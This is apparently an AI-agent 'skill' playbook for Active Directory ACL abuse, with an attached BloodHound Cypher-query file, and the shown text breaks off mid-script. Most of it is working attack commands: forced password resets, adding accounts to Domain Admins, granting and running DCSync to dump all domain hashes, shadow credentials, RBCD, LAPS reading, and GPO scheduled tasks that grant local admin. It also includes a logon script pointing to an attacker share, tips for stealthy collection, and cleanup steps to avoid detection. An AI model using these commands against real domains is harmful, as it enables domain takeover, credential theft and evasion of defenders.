# SKILL: AD ACL Abuse — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert AD ACL abuse techniques. Covers BloodHound enumeration, dangerous ACEs (GenericAll, WriteDACL, WriteOwner, etc.), DCSync, shadow credentials, targeted kerberoasting, group manipulation, LAPS, and GPO abuse. Base models miss complex ACL chain exploitation and Cypher query patterns.

## 0. RELATED ROUTING

Before going deep, consider loading:

- [active-directory-kerberos-attacks](../active-directory-kerberos-attacks/SKILL.md) for Kerberos attacks often chained with ACL abuse
- [active-directory-certificate-services](../active-directory-certificate-services/SKILL.md) for certificate-based attacks after ACL exploitation
- [ntlm-relay-coercion](../ntlm-relay-coercion/SKILL.md) for relay attacks that can set ACLs (LDAP relay)
- [windows-lateral-movement](../windows-lateral-movement/SKILL.md) after gaining elevated AD access

### Advanced Reference

Also load [BLOODHOUND_PATHS.md](./BLOODHOUND_PATHS.md) when you need:

- Common BloodHound attack paths with Cypher queries
- Custom Neo4j queries for finding complex chains
- Data collection and ingestion tips

---

## 1. BLOODHOUND ENUMERATION

### Data Collection

```bash
# SharpHound (from Windows, domain-joined)
SharpHound.exe -c all --outputdirectory C:\temp --zipfilename bh.zip

# bloodhound-python (from Linux)
bloodhound-python -d domain.com -u user -p password -c all -dc DC01.domain.com -ns DC_IP

# Specific collection methods
SharpHound.exe -c DCOnly              # Fastest — LDAP queries against the DC only
SharpHound.exe -c Session             # Session data only (run periodically)
SharpHound.exe -c All,GPOLocalGroup   # Include GPO-derived local group membership
```

### Key BloodHound Queries (Built-in)

- "Find all Domain Admins"
- "Shortest Paths to Domain Admins from Owned Principals"
- "Find Principals with DCSync Rights"
- "Shortest Paths to Unconstrained Delegation Systems"
- "Find computers where Domain Users are Local Admin"

---

## 2. DANGEROUS ACE TYPES

The first column mixes raw ACE rights (GenericAll, WriteDACL, WriteOwner) with the BloodHound edge names derived from object-specific rights (ForceChangePassword, AddMember, ReadLAPSPassword, WriteSPN).

| ACE / BloodHound edge | Effect on Users | Effect on Groups | Effect on Computers |
|---|---|---|---|
| **GenericAll** | Change password, set SPN, modify attributes | Add members | RBCD, LAPS read, all attributes |
| **GenericWrite** | Set SPN, modify attributes, shadow creds | Add members | RBCD, shadow credentials |
| **WriteDACL** | Grant yourself any permission | Same | Same |
| **WriteOwner** | Take ownership → then WriteDACL | Same | Same |
| **ForceChangePassword** | Reset password without knowing the old one | N/A | N/A |
| **AddMember** | N/A | Add self/others to group | N/A |
| **AllExtendedRights** | Force change password, read LAPS | N/A | Read LAPS, BitLocker keys |
| **ReadLAPSPassword** | N/A | N/A | Read local admin password |
| **WriteSPN** | Set SPN → targeted kerberoast | N/A | N/A |

---

## 3. ACE-SPECIFIC EXPLOITATION

### GenericAll on User

```powershell
# Option 1: Force change password (resets it: the legitimate user is locked out and will notice)
net user targetuser NewP@ss123 /domain

# Option 2: Targeted Kerberoasting
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/svc'}
# → Kerberoast, then clear the SPN again

# Option 3: Shadow Credentials
Whisker.exe add /target:targetuser /domain:domain.com /dc:DC01

# Option 4: Set logon script
Set-DomainObject -Identity targetuser -Set @{scriptpath='\\attacker\share\evil.ps1'}
```

### GenericAll / GenericWrite on Computer

```bash
# RBCD attack: writes msDS-AllowedToActOnBehalfOfOtherIdentity on TARGET$;
# CONTROLLED$ must be an account with an SPN that you control (e.g. a machine account you created)
rbcd.py -delegate-from 'CONTROLLED$' -delegate-to 'TARGET$' -action write DOMAIN/user:pass -dc-ip DC

# Shadow Credentials on computer
pywhisker.py -d domain.com -u user -p pass --target 'TARGET$' --action add --dc-ip DC
```

### WriteDACL

```powershell
# Grant DCSync rights to yourself (PowerView)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity lowpriv -Rights DCSync

# Impacket (Linux)
dacledit.py -action write -rights DCSync -principal lowpriv -target-dn "DC=domain,DC=com" DOMAIN/lowpriv:pass -dc-ip DC
```

### WriteOwner

```powershell
# Step 1: Take ownership
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity lowpriv

# Step 2: The owner implicitly holds WRITE_DAC, so grant yourself full control directly
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity lowpriv -Rights All

# Step 3: Exploit exactly as "GenericAll on User" above
```

### ForceChangePassword

```bash
# Samba rpcclient (Linux)
rpcclient -U 'DOMAIN/attacker%pass' DC01 -c "setuserinfo2 targetuser 23 'NewP@ss123!'"

# PowerView
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force)

# Samba net rpc (Linux)
net rpc password targetuser 'NewP@ss123!' -U DOMAIN/attacker%pass -S DC01
```

### AddMember to Group

```powershell
# Add self to privileged group (PowerView)
Add-DomainGroupMember -Identity "Domain Admins" -Members lowpriv

# Samba net rpc (Linux)
net rpc group addmem "Domain Admins" lowpriv -U DOMAIN/attacker%pass -S DC01
```

---
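The table in §2 and the per-ACE recipes in §3 are what BloodHound derives from each object's DACL. As an added example (not code from this playbook or from SharpHound/BloodHound, which parse the binary `nTSecurityDescriptor`), the script below does the same classification on the SDDL string PowerShell hands you via `(Get-ADObject -Identity <dn> -Properties nTSecurityDescriptor).nTSecurityDescriptor.Sddl`, and also answers the §4 question of whether a SID holds both replication rights. The domain SID and the sample SDDL are constructed; the rights GUIDs are the real schema values (the two replication GUIDs are the ones §4 cites).

```python
"""Classify the ACEs in an AD object's SDDL into BloodHound-style edges.

Added example, not BloodHound code. Deny ACEs and inherit-only ACEs are
deliberately ignored: the first never create a path, the second grant
nothing on the object itself (only on children created later).
"""
import re

# Access-mask bits behind the two-letter SDDL rights codes (MS-DTYP 2.5.1.2).
RIGHT_BITS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20, "DT": 0x40,
    "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
}
WRITE_PROP, CONTROL_ACCESS = RIGHT_BITS["WP"], RIGHT_BITS["CR"]
WRITE_DAC, WRITE_OWNER = RIGHT_BITS["WD"], RIGHT_BITS["WO"]
GENERIC_ALL, GENERIC_WRITE = RIGHT_BITS["GA"], RIGHT_BITS["GW"]
FULL_CONTROL = 0x000F01FF  # every DS right + all standard rights: the same as GenericAll

# Extended rights (rightsGuid) and attributes (schemaIDGUID) that become attack edges.
EXTENDED_RIGHTS = {
    "00299570-246d-11d0-a768-00aa006e0529": "ForceChangePassword",  # User-Force-Change-Password
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "GetChanges",           # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "GetChangesAll",        # DS-Replication-Get-Changes-All
}
WRITABLE_ATTRS = {
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "AddMember",             # member
    "f3a64788-5306-11d1-a9c5-0000f80367c1": "WriteSPN",              # servicePrincipalName
    "5b47d60f-6090-40b2-9f37-2a4de88f3063": "AddKeyCredentialLink",  # msDS-KeyCredentialLink
    "3f78c3e5-f79a-46bd-a0b8-9d18116ddc79": "AddAllowedToAct",       # msDS-AllowedToActOnBehalfOfOtherIdentity
}
ACE_RE = re.compile(r"\(([^)]*)\)")


def access_mask(rights: str) -> int:
    """'GA', 'WDWO', 'RPWPCR...' or a hex literal -> numeric access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    return sum(RIGHT_BITS.get(rights[i:i + 2], 0) for i in range(0, len(rights), 2))


def classify_ace(mask: int, object_type: str) -> set:
    """Map one allow ACE (mask + object-type GUID) to the edges BloodHound would draw."""
    obj = object_type.lower()
    if not obj and (mask & GENERIC_ALL or (mask & FULL_CONTROL) == FULL_CONTROL):
        return {"GenericAll"}                       # subsumes everything below
    edges = set()
    if mask & WRITE_DAC:
        edges.add("WriteDacl")
    if mask & WRITE_OWNER:
        edges.add("WriteOwner")
    if mask & (GENERIC_WRITE | WRITE_PROP):
        if not obj:
            edges.add("GenericWrite")               # write to every attribute
        elif obj in WRITABLE_ATTRS:
            edges.add(WRITABLE_ATTRS[obj])          # write to one dangerous attribute
    if mask & CONTROL_ACCESS:
        if not obj:
            edges.add("AllExtendedRights")          # every extended right, incl. the ones above
        elif obj in EXTENDED_RIGHTS:
            edges.add(EXTENDED_RIGHTS[obj])
    return edges


def dangerous_edges(sddl: str, domain_sid: str) -> list:
    """Return (trustee SID, edge) pairs for every ACE that grants something on the object."""
    aliases = {"BA": "S-1-5-32-544", "SY": "S-1-5-18", "AU": "S-1-5-11", "WD": "S-1-1-0",
               "DA": f"{domain_sid}-512", "DD": f"{domain_sid}-516", "EA": f"{domain_sid}-519"}
    sections = {p[0]: p[2:] for p in re.split(r"(?=[OGDS]:)", sddl) if p}  # O:, G:, D:, S:
    found = []
    for ace in ACE_RE.findall(sections.get("D", "")):
        ace_type, flags, rights, obj, _inherit_obj, trustee = ace.split(";")[:6]
        ace_flags = {flags[i:i + 2] for i in range(0, len(flags), 2)}  # e.g. "CIIO" -> {CI, IO}
        if ace_type not in ("A", "OA") or "IO" in ace_flags:
            continue                                # deny, or inherit-only: no edge on this object
        for edge in sorted(classify_ace(access_mask(rights), obj)):
            found.append((aliases.get(trustee, trustee), edge))
    return found


def has_dcsync(edges: list, sid: str) -> bool:
    """DCSync needs BOTH replication rights on the domain object (GenericAll/AllExtendedRights imply them)."""
    mine = {e for s, e in edges if s == sid}
    return bool(mine & {"GenericAll", "AllExtendedRights"}) or {"GetChanges", "GetChangesAll"} <= mine


# Constructed sample: the DACL of a domain object with a few interesting ACEs.
DOMAIN_SID = "S-1-5-21-1004336348-1177238915-682003330"
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    f"(A;;GA;;;{DOMAIN_SID}-1105)"                                       # GenericAll
    f"(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;{DOMAIN_SID}-1106)"  # ForceChangePassword
    f"(OA;;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;{DOMAIN_SID}-1107)"  # AddMember
    f"(A;;WDWO;;;{DOMAIN_SID}-1108)"                                     # WriteDacl + WriteOwner
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DA)"                  # GetChanges
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DA)"                  # GetChangesAll
    f"(D;;GA;;;{DOMAIN_SID}-1109)"                                       # deny ACE: ignored
    f"(A;CIIO;GA;;;{DOMAIN_SID}-1110)"                                   # inherit-only: ignored
    "(A;;0x000F01FF;;;BA)"                                               # hex full control == GenericAll
)

if __name__ == "__main__":
    edges = dangerous_edges(SAMPLE_SDDL, DOMAIN_SID)
    for sid, edge in edges:
        print(f"{sid:55} {edge}")
    print("DA can DCSync:", has_dcsync(edges, f"{DOMAIN_SID}-512"))
```

Feed it the SDDL of the domain object to reproduce "Find Principals with DCSync Rights" without Neo4j, or the SDDL of a user/group to see which §3 recipe applies. A GenericAll ACE that carries an object-type GUID is not mapped (rare in practice), and the `ms-Mcs-AdmPwd` read edge is left out because that attribute's GUID is forest-specific.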
## 4. DCSYNC ATTACK

### Prerequisites

The principal needs **both** of these replication rights on the domain object:

- `DS-Replication-Get-Changes` (GUID: `1131f6aa-9c07-11d1-f79f-00c04fc2dcd2`)
- `DS-Replication-Get-Changes-All` (GUID: `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2`)

GenericAll or AllExtendedRights on the domain object cover both (they include every control-access right), which is why WriteDACL on the domain object is equivalent to DCSync.

### Execution

```bash
# Impacket — dump all hashes
secretsdump.py DOMAIN/user:password@DC01 -just-dc

# Specific account only
secretsdump.py DOMAIN/user:password@DC01 -just-dc-user krbtgt

# Mimikatz
lsadump::dcsync /domain:domain.com /user:krbtgt
lsadump::dcsync /domain:domain.com /all /csv

# Impacket with Kerberos auth (target must be the DC's FQDN so the SPN matches)
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass domain.com/admin@DC01.domain.com -just-dc
```

### Who Has DCSync by Default?

- Domain Admins
- Enterprise Admins
- Domain Controllers group
- `BUILTIN\Administrators` (on domain object)

---

## 5. SHADOW CREDENTIALS

### Attack Flow

Write `msDS-KeyCredentialLink` on target → generate certificate → authenticate via PKINIT.

```bash
# pyWhisker (Linux)
pywhisker.py -d domain.com -u attacker -p pass --target victim --action add --dc-ip DC01
# Output: DeviceID and PFX file (keep the DeviceID for cleanup)

# Authenticate with certificate (PKINITtools)
gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass RANDOM_PASS domain.com/victim victim.ccache
export KRB5CCNAME=victim.ccache

# Recover the NT hash for pass-the-hash: U2U TGS request, PAC decrypted with the
# AS-REP encryption key that gettgtpkinit.py printed
getnthash.py -key AS_REP_KEY domain.com/victim
```

```powershell
# Whisker (Windows)
Whisker.exe add /target:victim /domain:domain.com /dc:DC01.domain.com
# → Provides Rubeus command to get TGT
Rubeus.exe asktgt /user:victim /certificate:CERT_B64 /password:PASS /ptt
```

**Cleanup**: Remove the added key credential to avoid detection, using the DeviceID printed at add time (`pywhisker.py ... --action remove --device-id <ID>` or `Whisker.exe remove /target:victim /deviceid:<ID>`). Requires the DC to support PKINIT (a Server Authentication certificate on the DC, i.e. AD CS or another CA present).

---
## 6. LAPS PASSWORD READING

```powershell
# PowerView (legacy LAPS: ms-Mcs-AdmPwd)
Get-DomainComputer -Identity TARGET -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime

# AD Module
Get-ADComputer -Identity TARGET -Properties ms-Mcs-AdmPwd | Select-Object ms-Mcs-AdmPwd

# LAPS v2 (Windows LAPS: msLAPS-Password / msLAPS-EncryptedPassword)
Get-LapsADPassword -Identity TARGET -AsPlainText

# CrackMapExec (legacy LAPS attribute)
crackmapexec ldap DC01 -u user -p pass --module laps
```

---

## 7. GPO ABUSE

### Identify Writable GPOs

```powershell
# PowerView — find GPOs where you have write access
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {
    ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') -and
    ($_.SecurityIdentifier -match 'YOUR_SID')
}
```

Write access to the GPO object alone is not enough: check where the GPO is linked (`gPLink` on the OU/domain) and that the link is enabled, otherwise the payload never runs anywhere.

### Exploit via SharpGPOAbuse

```powershell
# Add local admin via GPO
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount lowpriv --GPOName "Vulnerable GPO"

# Add scheduled task via GPO
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\admin --Command "cmd.exe" --Arguments "/c net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"

# Add startup script
SharpGPOAbuse.exe --AddComputerScript --ScriptName "evil.bat" --ScriptContents "net localgroup administrators lowpriv /add" --GPOName "Vulnerable GPO"
```

```bash
# pyGPOAbuse (Linux)
pygpoabuse.py DOMAIN/user:pass -gpo-id "GPO_GUID" -command "net localgroup administrators lowpriv /add" -dc-ip DC01
```

Payloads only run at the next Group Policy refresh on the linked hosts (by default every 90 minutes plus a random offset of up to 30 minutes; domain controllers refresh every 5 minutes), or immediately after `gpupdate /force` on a host you already control.

---
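Finding a GPO you can write is only half of §7; the other half is knowing which objects it really applies to once link order, disabled links, enforced links and block-inheritance are taken into account. As an added example (not the playbook's code, and not from SharpGPOAbuse or pyGPOAbuse), the script below resolves the effective GPO list for an object from the `gPLink` and `gPOptions` attributes of its containers, the way Group Policy processing does (site links, WMI filters and security filtering are out of scope). All DNs, GUIDs and names are constructed, apart from the two well-known GUIDs of the Default Domain Policy and Default Domain Controllers Policy.

```python
"""Which GPOs actually apply to an AD object, from gPLink / gPOptions.

Added example, not part of any GPO tool. Shows why a writable GPO linked to
the Domain Controllers OU is useless when the link is disabled, and why a
block-inheritance OU still receives an enforced GPO from the domain.
"""
import re

LINK_RE = re.compile(r"\[LDAP://([^;\]]+);(\d+)\]", re.IGNORECASE)
LINK_DISABLED, LINK_ENFORCED = 1, 2   # gPLink per-link option bits
BLOCK_INHERITANCE = 1                 # gPOptions bit on the OU / domain object


def parse_gplink(gplink):
    """[(gpo_dn, options)] in link order; the first link has the highest precedence."""
    return [(dn, int(opt)) for dn, opt in LINK_RE.findall(gplink or "")]


def ancestors(dn):
    """dn, its parent, ..., up to the domain root (assumes no escaped commas in RDNs)."""
    parts = dn.split(",")
    while True:
        yield ",".join(parts)
        if all(p.upper().startswith("DC=") for p in parts):
            return                                  # reached the domain object
        parts = parts[1:]


def effective_gpos(target_dn, containers):
    """GPO DNs applying to target_dn, winning (highest precedence) first.

    containers: {container DN: {"gPLink": str, "gPOptions": int}} as read from LDAP.
    Rules: a container's own links beat its ancestors' (child OU > OU > domain);
    a block-inheritance container drops the non-enforced links of its ancestors;
    enforced links beat everything, and among them the one closest to the root wins.
    """
    normal, enforced_by_level, blocked = [], [], False
    for dn in ancestors(target_dn):                 # target first, domain last
        attrs = containers.get(dn, {})
        level_enforced = []
        for gpo_dn, opt in parse_gplink(attrs.get("gPLink", "")):
            if opt & LINK_DISABLED:
                continue                            # linked but switched off: no effect at all
            if opt & LINK_ENFORCED:
                level_enforced.append(gpo_dn)       # immune to block-inheritance below it
            elif not blocked:
                normal.append(gpo_dn)
        enforced_by_level.append(level_enforced)
        if attrs.get("gPOptions", 0) & BLOCK_INHERITANCE:
            blocked = True                          # from here up, only enforced links count
    enforced = [g for level in reversed(enforced_by_level) for g in level]
    ordered, seen = [], set()
    for gpo in enforced + normal:                   # dedupe a GPO linked at several levels
        if gpo.lower() not in seen:
            seen.add(gpo.lower())
            ordered.append(gpo)
    return ordered


def writable_gpos_in_effect(target_dn, containers, writable):
    """The subset of the GPOs we can edit that really take effect on target_dn."""
    wanted = {w.lower() for w in writable}
    return [g for g in effective_gpos(target_dn, containers) if g.lower() in wanted]


# Constructed directory: the writable GPO is linked to the DC OU but DISABLED there,
# and linked (enabled) to OU=Servers, which blocks inheritance from the domain.
DOMAIN = "DC=domain,DC=com"
POLICIES = f"CN=Policies,CN=System,{DOMAIN}"
DEFAULT_DOMAIN = f"CN={{31B2F340-016D-11D2-945F-00C04FB984F9}},{POLICIES}"  # Default Domain Policy
DEFAULT_DC = f"CN={{6AC1786C-016F-11D2-945F-00C04FB984F9}},{POLICIES}"      # Default Domain Controllers Policy
VULN_GPO = f"CN={{A1B2C3D4-0000-4000-8000-000000000001}},{POLICIES}"        # constructed, writable by lowpriv
HARDENING = f"CN={{A1B2C3D4-0000-4000-8000-000000000002}},{POLICIES}"       # constructed, enforced at domain level
CONTAINERS = {
    DOMAIN: {"gPLink": f"[LDAP://{DEFAULT_DOMAIN};0][LDAP://{HARDENING};2]", "gPOptions": 0},
    f"OU=Domain Controllers,{DOMAIN}": {"gPLink": f"[LDAP://{DEFAULT_DC};0][LDAP://{VULN_GPO};1]", "gPOptions": 0},
    f"OU=Servers,{DOMAIN}": {"gPLink": f"[LDAP://{VULN_GPO};0]", "gPOptions": 1},
}

if __name__ == "__main__":
    for host in (f"CN=DC01,OU=Domain Controllers,{DOMAIN}", f"CN=SRV01,OU=Servers,{DOMAIN}"):
        print(host)
        for gpo in effective_gpos(host, CONTAINERS):
            print("   ", gpo, "<-- writable" if gpo == VULN_GPO else "")
```

With the constructed data, DC01 never receives the writable GPO (its link is disabled, and re-enabling it needs write access to the OU's `gPLink`, a different ACL), while SRV01 does, behind the enforced domain-level GPO. Pull `gPLink`/`gPOptions` for the domain and every OU with one LDAP query and the same function answers the question for any target.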
## 8. ACL ATTACK DECISION TREE

```
Have domain user access — want to escalate via ACL
│
├── Run BloodHound → analyze shortest paths to DA
│   └── Upload data → "Shortest Paths to Domain Admins from Owned Principals"
│
├── Direct ACL on user object?
│   ├── GenericAll → force password change, shadow creds, or targeted kerberoast (§3)
│   ├── GenericWrite → shadow credentials or set SPN (§3/§5)
│   ├── ForceChangePassword → reset password directly (§3)
│   ├── WriteDACL → grant yourself GenericAll, then exploit (§3)
│   └── WriteOwner → take ownership → WriteDACL → GenericAll (§3)
│
├── ACL on group?
│   ├── AddMember / GenericAll → add self to privileged group (§3)
│   └── WriteDACL → grant AddMember, then add self
│
├── ACL on computer object?
│   ├── GenericAll/GenericWrite → RBCD attack (§3)
│   ├── AllExtendedRights → read LAPS password (§6)
│   └── GenericWrite → shadow credentials on machine (§5)
│
├── ACL on domain object?
│   ├── WriteDACL → grant DCSync rights to self (§4)
│   └── Replication rights already? → DCSync directly (§4)
│
├── ACL on GPO linked to privileged OU?
│   └── Write access → add admin / scheduled task via GPO (§7)
│
└── Complex multi-hop chain?
    └── Load BLOODHOUND_PATHS.md for Cypher queries and chain analysis
```

---

Attachment: BLOODHOUND_PATHS.md

# BloodHound Attack Paths & Cypher Queries

> **AI LOAD INSTRUCTION**: Load this for common BloodHound attack paths, custom Cypher queries for Neo4j, and chain analysis techniques. Assumes the main [SKILL.md](./SKILL.md) is already loaded for individual ACL abuse techniques.

---
## 1. BLOODHOUND DATA COLLECTION BEST PRACTICES

### Collection Methods Comparison

| Method | Speed | Noise | Data |
|---|---|---|---|
| `DCOnly` | Fast | Low | Users, groups, trusts, ACLs (LDAP against the DC only) |
| `All` | Slow | High | Everything including sessions and local groups |
| `Session` | Medium | Medium | Logged-in user sessions (run multiple times) |
| `ACL` | Medium | Low | ACL data only |
| `ObjectProps` | Fast | Low | Object properties (descriptions, etc.) |

### Stealth Collection

```bash
# Minimum noise — LDAP against the DC only, no SMB to member hosts
bloodhound-python -d domain.com -u user -p pass -c DCOnly -dc DC01.domain.com

# Add sessions over time
bloodhound-python -d domain.com -u user -p pass -c Session -dc DC01.domain.com

# Host-touching methods (the noisy SMB part) in stealth mode, never against the DCs
SharpHound.exe -c Session,LocalGroup --stealth --excludedcs
```

---

## 2. ESSENTIAL CYPHER QUERIES

### 2.1 Find All Paths to Domain Admin

```cypher
MATCH p=shortestPath((n)-[*1..]->(m:Group))
WHERE m.name STARTS WITH "DOMAIN ADMINS"
AND n.owned = true
RETURN p
```

### 2.2 Find Users with DCSync Rights

```cypher
// Both replication edges are required, directly or through group membership
MATCH p=(n)-[:MemberOf|GetChanges*1..]->(d:Domain)
MATCH p2=(n)-[:MemberOf|GetChangesAll*1..]->(d)
WHERE n:User OR n:Group
RETURN n.name
```

### 2.3 Kerberoastable Users with Paths to DA

```cypher
MATCH (u:User {hasspn:true})
MATCH p=shortestPath((u)-[*1..]->(g:Group))
WHERE g.name STARTS WITH "DOMAIN ADMINS"
RETURN u.name, length(p) AS hops
ORDER BY hops ASC
```

### 2.4 Users with Dangerous ACLs

```cypher
MATCH p=(n:User)-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner|ForceChangePassword]->(m)
WHERE NOT n.name STARTS WITH "DVTA"   // exclude a known-noisy account prefix; adjust or drop
RETURN n.name AS attacker, type(r) AS permission, m.name AS target
```

### 2.5 Find Computers with Unconstrained Delegation

```cypher
// Name-prefix heuristic: DCs are expected to have unconstrained delegation,
// so filter them out and look at what is left
MATCH (c:Computer {unconstraineddelegation:true})
WHERE NOT c.name STARTS WITH "DC"
RETURN c.name
```

### 2.6 Find AS-REP Roastable Users

```cypher
MATCH (u:User {dontreqpreauth:true})
RETURN u.name, u.description
```

### 2.7 Computers Where Domain Users Are Local Admin

```cypher
MATCH p=(g:Group {name:"DOMAIN USERS@DOMAIN.COM"})-[:AdminTo]->(c:Computer)
RETURN c.name
```

### 2.8 Find All GPO Controllers

```cypher
MATCH p=(n)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl]->(g:GPO)
RETURN n.name AS controller, g.name AS gpo, type(r) AS permission
```

### 2.9 Shortest Path from Owned to High-Value Targets

```cypher
MATCH p=shortestPath((n {owned:true})-[*1..]->(m {highvalue:true}))
RETURN p
```

### 2.10 Find LAPS Readers

```cypher
MATCH p=(n)-[:ReadLAPSPassword]->(c:Computer)
RETURN n.name AS reader, c.name AS computer
```

---

## 3. COMMON ATTACK PATH PATTERNS

### Pattern 1: Nested Group Membership → DA

```
lowpriv_user
└── MemberOf → IT-Support
    └── MemberOf → Server-Admins
        └── MemberOf → Domain Admins
```

```cypher
MATCH p=(u:User {name:"LOWPRIV_USER@DOMAIN.COM"})-[:MemberOf*1..5]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.COM"})
RETURN p
```

### Pattern 2: ACL Chain → GenericAll → Password Reset → DA

```
lowpriv_user
└── GenericWrite → helpdesk_user
    └── GenericAll → svc_admin (DA member)
        └── ForceChangePassword → reset password → DA
```

### Pattern 3: WriteDACL → DCSync

```
lowpriv_user
└── WriteDACL on Domain Object
    └── Grant self GetChanges + GetChangesAll
        └── DCSync → all domain hashes
```

### Pattern 4: GPO Abuse → Local Admin on DC

```
lowpriv_user
└── GenericWrite on GPO linked to "Domain Controllers" OU
    └── Add scheduled task via GPO
        └── Task runs on DCs → SYSTEM on DC
```

### Pattern 5: LAPS + Local Admin → Session Hijack

```
lowpriv_user
└── ReadLAPSPassword on TARGET_SERVER
    └── Local admin on TARGET_SERVER
        └── Domain Admin session on TARGET_SERVER
            └── Credential dump → DA hash
```

---
## 4. CUSTOM BLOODHOUND QUERIES FOR SPECIFIC SCENARIOS

### Find Users with Passwords in Description

```cypher
MATCH (u:User)
WHERE u.description =~ '(?i).*(pass|pwd|cred|secret).*'
RETURN u.name, u.description
```

### Find All ACL Paths Between Two Nodes

```cypher
MATCH p=allShortestPaths((a)-[r*1..7]->(b))
WHERE a.name = "LOWPRIV_USER@DOMAIN.COM"
AND b.name = "DOMAIN ADMINS@DOMAIN.COM"
AND ALL(rel IN relationships(p) WHERE type(rel) IN
    ["GenericAll","GenericWrite","WriteDacl","WriteOwner","ForceChangePassword",
     "AddMember","MemberOf","AdminTo","HasSession","CanRDP","CanPSRemote"])
RETURN p
```

### High-Value Target Identification

```cypher
MATCH (n)
WHERE n.highvalue = true
RETURN labels(n)[0] AS type, n.name AS target
ORDER BY type
```

### Find Kerberoastable Service Accounts with Admin Rights

```cypher
MATCH (u:User {hasspn:true})-[:AdminTo]->(c:Computer)
RETURN u.name AS service_account, collect(c.name) AS admin_on
```

### Computers Trusting Machine Accounts for Delegation

```cypher
MATCH (c1:Computer)-[:AllowedToDelegate]->(c2:Computer)
RETURN c1.name AS delegator, c2.name AS target
```

---

## 5. BLOODHOUND CE (COMMUNITY EDITION) TIPS

### API Queries (BloodHound CE)

```bash
# List available attack paths via API
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://bloodhound.local/api/v2/attack-paths" | jq

# Get path findings for a specific domain
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://bloodhound.local/api/v2/domains/$DOMAIN_ID/attack-path-findings" | jq
```

The attack-path finding endpoints belong to the BloodHound Enterprise API; on a CE deployment they return nothing useful, so run the Cypher queries from this file through the API instead (`POST /api/v2/graphs/cypher` with a JSON body containing `query`).

### Mark Nodes as Owned

```cypher
// Mark compromised user
MATCH (u:User {name:"LOWPRIV_USER@DOMAIN.COM"})
SET u.owned = true
RETURN u.name
```

### Mark High-Value Targets

```cypher
// Mark custom high-value targets
MATCH (c:Computer {name:"SQLSERVER01.DOMAIN.COM"})
SET c.highvalue = true
RETURN c.name
```

---
## 6. ATTACK PATH DECISION FLOW

```
BloodHound data collected and imported
│
├── Mark owned principals (compromised users/computers)
│
├── Run "Shortest Paths from Owned to DA"
│   ├── Direct path found? → follow the chain
│   │   ├── ACL edge → exploit per SKILL.md §3
│   │   ├── Session edge → credential dump on that host
│   │   └── AdminTo edge → lateral movement to host
│   └── No path found?
│       ├── Run custom queries (§4) for non-obvious paths
│       ├── Check for Kerberoastable → high-value paths (§2.3)
│       └── Look for LAPS readers → local admin chains (§2.10)
│
├── No path to DA at all?
│   ├── Check for paths to other high-value targets
│   ├── Expand attack surface: compromise more users/hosts
│   ├── Re-collect session data (sessions change over time)
│   └── Look for cross-domain trust paths
│
└── Multiple paths available?
    ├── Prefer: ForceChangePassword (simplest, but disruptive: the legitimate user is
    │           locked out and the old password cannot be restored)
    ├── Then: Shadow Credentials (reversible, user keeps working)
    ├── Then: Targeted Kerberoast (if crackable; the SPN can be removed afterwards)
    └── Avoid: Adding to Domain Admins (noisy, alerted almost everywhere)
```
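The path patterns in §3 and the "multiple paths available" branch of the decision flow above pull in opposite directions: BloodHound's `shortestPath()` minimises hops, so on a graph that also contains a one-hop `AddMember` to Domain Admins it will happily return the noisiest option. As an added example (not BloodHound code), the script below runs the same search over a BloodHound-style edge list but with Dijkstra and a per-edge-type noise cost, so the longer chain of reversible steps wins. The weights and the graph are constructed (the graph is Pattern 2 plus two shortcuts); tune the weights for the engagement and the defender's detection coverage.

```python
"""Rank attack paths by operational noise instead of hop count.

Added example, not BloodHound code. fewest_hops() reproduces what
shortestPath() does; quietest_path() is the alternative the decision flow
asks for. Node names follow BloodHound's NAME@DOMAIN convention.
"""
import heapq
import itertools
from collections import deque

# Cost per edge type (higher = louder or more disruptive). Constructed values.
NOISE = {
    "MemberOf": 0,              # already true, nothing to execute
    "HasSession": 1,            # credential dump on a host you already own
    "AdminTo": 1,
    "ReadLAPSPassword": 1,      # a single LDAP read
    "AddKeyCredentialLink": 2,  # shadow credentials, reversible
    "GenericWrite": 2,          # realised via shadow credentials
    "GenericAll": 2,
    "WriteSPN": 3,              # targeted kerberoast, needs an offline crack
    "WriteDacl": 4,             # ACL change on the target (event 5136 when DS auditing is on)
    "WriteOwner": 4,
    "ForceChangePassword": 5,   # locks the legitimate user out, not reversible
    "GetChangesAll": 5,         # DCSync replication traffic from a non-DC
    "AddMember": 6,             # privileged group change, alerted almost everywhere
}


def _adjacency(edges):
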